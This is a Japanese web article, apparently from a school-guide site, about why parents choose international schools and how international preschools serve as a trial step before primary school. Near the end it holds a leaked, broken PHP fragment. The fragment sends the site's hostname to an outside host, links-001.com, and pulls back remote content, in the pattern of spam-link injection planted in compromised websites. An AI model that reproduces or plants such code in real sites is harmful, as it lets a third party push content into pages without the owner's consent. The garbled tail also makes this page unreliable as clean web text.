前へ
次へ

インターナショナルスクールを選ぶ背景

インターナショナルスクールは、日本在住の外国籍の児童のための教育施設であるイメージが未だに根強いものの、教育も国際化・多様化するようになり、日本の児童も入学できるスクールも数は多くないものの、開校しています。
進学希望する児童より、親が必要性を感じているようで、その背景には、豊かな文化、教育法への憧れはもちろん、流暢な英語力を求めているようです。
しかし、通うのは児童ですから、選択肢を複数残しておかなければなりません。
そのファーストステップに【プリスクール】があります。
幼稚園や保育園から語学力を養えることを謳っている教育施設になります。
インターナショナルスクールは、小学校・中学校・高校での教育施設と呼ばれています。
お受験ではありませんが、入学や進学するための予備校というイメージなのがインターナショナルプリスクールなのです。
幼児も英語教育を受けるべき、しかし、その後に日本の教育施設である小学校に入学するケースもあります。
肌に合わない、ミスマッチであれば、児童の将来も不安になります。
小中一貫校(一貫教育)ですから、退学もできません。
ひきこもり、そうしたマイナス要素をつくらないためにプリスクールという体験を行うワケです。
インターナショナルスクールへの進学、日本の小学校への進学、園児にとってはどちらの場合も貴重な体験ができるのは間違いありません。
インターナショナルというだけあって、国際色豊かな人種が集うワケですから、感受性豊かに成長できます。
いわゆる人権の尊重、肌の色で差別しないことをしっかり教育されるのです。
もちろん、小学校受験に対応する能力、受験指導プログラムを導入するなど、学歴社会が日本でものをいうだけあって、学力を考えれば日本の小学校進学がいいのかもしれません。
ちなみに、インターナショナルスクールは学校教育法に定める学校ではないことをご存知でしょうか。
中には、大検を受けないと大学受験資格が得られない「認可」の問題があるようです。
また、英語力を条件として、英語での面接を行うスクールも少なくありません。
ネイティブスピーカー並みの英語力を親も身につけなければ結局のところ、担任とも、親同士とも、児童とも円滑なコミュニケーションすら図れないことになります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top